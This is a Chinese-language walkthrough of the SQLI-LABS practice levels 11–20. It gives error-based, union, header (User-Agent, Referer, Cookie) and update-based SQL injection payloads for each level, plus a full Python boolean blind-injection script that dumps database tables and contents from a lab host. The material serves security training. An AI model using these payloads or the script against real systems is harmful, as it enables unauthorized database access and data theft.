SQLI-LABS Page1 11-20

2024-01-17 11:27:40

0x0B Less-11

报错注入,只是注入方式为POST,可以直接使用报错函数进行注入,也可以使用常规方法

  • 报错注入,之后更改注入语句即可
    SQLI-LABS Page1 11-20 
uname=admin' and updatexml(1,concat(0x7e,(database()),0x7e),1)#&passwd=123&submit=Submit
uname=admin' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&passwd=123&submit=Submit
uname=admin' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#&passwd=123&submit=Submit
  • 常规注入
uname=admin' order by 2#&passwd=123&submit=Submit
uname=' union select database(),(select group_concat(table_name) from information_schema.tables where table_schema=(database()))#&passwd=123&submit=Submit
uname=' union select database(),(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')#&passwd=123&submit=Submit

0x0C Less-12

根据报错信息,得到分界符为"),其余操作如Less-11

0x0D Less-13

根据报错判断分界符'),可以直接使用报错注入,回显无搜索的列,可使用bool盲注

  • bool盲注
import requests

url = "http://192.168.44.214/sqli-labs/Less-13/"
_columns = []
_tables = []
_database = ""
resolver = "')"

data = {
    "uname":"1",
    "passwd":"123",
    "submit":"Submit"
}

def binarySearch(payload):
    maxn = 144
    minn = 1
    while minn<=maxn:
        middle = (maxn+minn)//2
        payload1 = payload+">"+str(middle)+"#"
        data['uname'] = payload1
        #print(payload1)
        #exit(0)
        r = requests.post(url, data=data)
        # print(r.text)
        # exit(0)
        if "slap.jpg" in r.text:
            maxn = middle-1
        else:
            minn = middle+1
    return minn

def getLength(func):
    payload1 = resolver+" or length({})".format(func)
    return binarySearch(payload1)

def getStr(func, length):
    mstr = ""
    for i in range(1,length+1):
        payload = resolver+" or ascii(substr({},{},1))".format(func,i)
        tmp = binarySearch(payload)
        mstr += chr(tmp)
        #print(mstr)
    return mstr
def getDatabase():
    global _database
    func = "database()"
    result = getStr(func, getLength(func))
    print("[*] database: "+result)
    _database = result

def getTaleNUM(database):
    func = "(select count(table_name) from information_schema.tables where table_schema='{}')".format(database)
    length = getLength(func)
    print(length)
    result = getStr(func, length)
    print("[*] table num ="+result)

def getTales(database):
    global _tables
    func = "(select group_concat(table_name) from information_schema.tables where table_schema='{}')".format(database)
    length = getLength(func)
    result = getStr(func, length)
    _tables = result.split(',')
    print("[*] tables: "+result)

def getColumns(table, database):
    global _columns
    func = "(select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}')".format(table, database)
    length = getLength(func)
    #print(length)
    result = getStr(func, length)
    _columns = result.split(",")
    print("[*] columns from {}:".format(table)+result)

def getInformation(table, column):
    Info = {}
    for i in column:
        func = "(select group_concat({}) from {})".format(i, table)
        length = getLength(func)
        #print(length)
        result = getStr(func, length)
        Info[i] = result.split(',')
        #print(result)
        #print(Info[i])
    for i in range(len(Info[column[0]])):
        mstr = ""
        for j in column:
            mstr += Info[j][i]
            mstr += "   "
        print(mstr)


if __name__ == "__main__":
    getDatabase()
    getTales(_database)
    getColumns(_tables[0],_database)
    getInformation(_tables[0], _columns)

0x0E Less-14

根据报错,判断分界符为",脚本和前一题一样

0x0F Less-15

无报错信息,尝试万能密码成功进入,可使用Less-13脚本进行布尔盲注,将分解符替换为'

0x10 Less-16

更改Less-13脚本的分界符为")

0x11 Less-17

passwd能够报错,可以参照Less-11的报错注入,当然,还有其他做法,还可以使用二次注入,利用字段更新将sql语句的结果写入字段后,读取获得。

  • 报错注入
    SQLI-LABS Page1 11-20
  • 利用数据更新
    当没有报错信息时,可用尝试插入一些sql语句,语句执行后,将所需要的数据保存到字段之中,通过查看字段得到信息。
    SQLI-LABS Page1 11-20
    uname=admin&passwd=',password=database(),username='admin&submit=Submit
    提交以上语句,将数据库名保存到admin的密码中,再去能查看密码的关卡查询:
    SQLI-LABS Page1 11-20
    的到相关信息
    完整查询语句:
uname=admin&passwd=',password=database(),username='admin&submit=Submit
查询表名:
uname=admin&passwd=',password=substr((select group_concat(table_name) from information_schema.tables where table_schema=(database())),1,10),username='admin&submit=Submit
uname=admin&passwd=',password=substr((select group_concat(table_name) from information_schema.tables where table_schema=(database())),11,25),username='admin&submit=Submit
查询列名以及信息,和之前关卡一样,需要注意的是字段能保存的数据长度有限制,需要分多次查询

0x12 Less-18

随手登录一个账号,发现显示了UA的信息,并尝试更改UA,发现信息改变,可能为UA注入

SQLI-LABS Page1 11-20
单引号UA报错,可以使用报错注入,注意源码中此处数据为插入数据,需要闭合括号。
payload:

1',1,updatexml(1,concat(0x7e,(database()),0x7e),1))#

SQLI-LABS Page1 11-20

0x13 Less-19

登录之后显示reffer,输入单引号,报错,只是位置换了,其余和Less-18一样
SQLI-LABS Page1 11-20

0x14 Less-20

登录之后查看cookie
SQLI-LABS Page1 11-20
SQLI-LABS Page1 11-20
尝试单引号,报错,尝试报错注入,成功拿取数据
SQLI-LABS Page1 11-20
联合注入:

Cookie: uname=admin1' order by 4# 获取列数
Cookie: uname=adm' union select 1,2,database()#  获取数据库
Cookie: uname=adm' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
上一篇:sqli-labs全通关payload


下一篇:XSS之xss-labs-level17